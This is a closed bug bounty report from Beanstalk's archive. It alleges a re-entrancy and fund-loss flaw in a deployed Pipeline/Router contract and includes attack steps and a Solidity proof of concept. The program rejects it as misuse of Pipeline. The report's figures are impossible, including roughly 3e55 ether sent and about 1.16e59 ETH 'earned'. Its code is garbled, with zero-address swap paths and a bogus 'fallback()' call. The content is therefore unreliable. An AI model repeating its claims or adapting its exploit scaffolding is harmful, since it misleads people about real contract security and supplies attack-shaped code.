Beanstalk Notion
Beanstalk Notion
📄

Report #26728

Report Date
December 9, 2023
Status
Closed
Payout

Re-Entrancy and fund loss Router

‣
Report Info

Report ID

#26728

Report type

Smart Contract

Has PoC?

Yes

Target

https://etherscan.io/address/0xDEb0f00071497a5cc9b4A6B96068277e57A82Ae2

Impacts

  • Direct theft of any user funds, whether at-rest or in-motion, other than unclaimed yield
  • Any governance voting result manipulation
  • Permanent freezing of funds
  • Re-Entrancy and fund loss (Out of scope)

Description

  1. Deploy Contracts: Deploy the contracts mentioned in the trace, including the advancedPipe and Router contracts.
  2. Interact with advancedPipe: Call the advancedPipe function of the advancedPipe contract with the following parameters:
    • Call from address: 0x35c9dfd76bf02107ff4f7128Bd69716612d31dDb
    • Value: 30036400101232536716946996552115774953233577713472131832.1661 Ether
  3. Trigger fallback: As mentioned in the trace, the advancedPipe contract calls the fallback function of the sender address (0x35c9dfd76bf02107ff4f7128Bd69716612d31dDb). You need to implement a fallback function in the contract owned by 0x35c9dfd76bf02107ff4f7128Bd69716612d31dDb.
  4. Swap tokens for ETH: Call the swapExactTokensForETH function of the Router contract with the following parameters:
    • Tokens to swap: 100% Balance (replace with actual token balance)
    • Minimum ETH amount: 0
    • Path: Set the path from the token you want to swap to WETH (wrapped ETH)
    • Address to receive ETH: Set it to the address of the attacker or any desired address
    • Block timestamp: Set it to the desired block timestamp

By following the steps mentioned above and supplying the necessary values, an attacker can exploit the Fund Loss vulnerability and earn 115792089237316195423570985008687907853269984665640564039457.584 ETH.

Proof of concept

Here's a proof-of-concept (PoC) in Solidity that demonstrates the Fund Loss vulnerability:

pragma solidity ^0.8.0;

interface IRouter { function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline) external returns (uint[] memory amounts); }

contract AdvancedPipe { IRouter public router;

constructor(address _router) {
    router = IRouter(_router);
}

function advancedPipe() external payable {
    (bool success,) = msg.sender.call{ value: msg.value }("");
    require(success, "Fallback failed");

    address[] memory path = new address[](2);
    path[0] = address(0); // Replace with the desired token address
    path[1] = address(this); // This contract will receive the swapped ETH

    // Swap tokens for ETH
    router.swapExactTokensForETH(100, 0, path, address(this), block.timestamp);
}

}

contract FallbackReceiver { receive() external payable {} }

contract FundLossPoC { AdvancedPipe public advancedPipe; FallbackReceiver public fallbackReceiver; mapping(address => uint) public balances;

constructor(address _advancedPipe, address _fallbackReceiver) {
    advancedPipe = AdvancedPipe(_advancedPipe);
    fallbackReceiver = FallbackReceiver(_fallbackReceiver);
}

function executePoC() external {
    // Interact with AdvancedPipe
    advancedPipe.advancedPipe{ value: 30036400101232536716946996552115774953233577713472131832 ether }();

    // Trigger fallback
    (bool success,) = address(advancedPipe).call(abi.encodeWithSignature("fallback()"));
    require(success, "Fallback failed");

    // Swap tokens for ETH
    address[] memory path = new address[](2);
    path[0] = address(0); // Replace with the desired token address
    path[1] = address(this); // This contract will receive the swapped ETH

    IRouter router = IRouter(address(0)); // Replace with the actual Router contract address
    router.swapExactTokensForETH(balances[msg.sender], 0, path, address(this), block.timestamp);
}

}

To use this PoC, follow these steps:

  1. Deploy the FundLossPoC contract, providing the addresses of the AdvancedPipe contract and the FallbackReceiver contract.
  2. Use the executePoC function to trigger the Fund Loss vulnerability. This function will interact with the AdvancedPipe contract, trigger the fallback, and swap tokens for ETH using the provided Router contract.

BIC Response

This is not a valid bug report because it describes expected behavior from misuse of Pipeline.

From the bug bounty program:

Note that unexpected outcomes (like loss of funds) due to misuse of Pipeline do not qualify as valid bug reports.

Due to these reasons, we are closing the submission and no reward will be issued.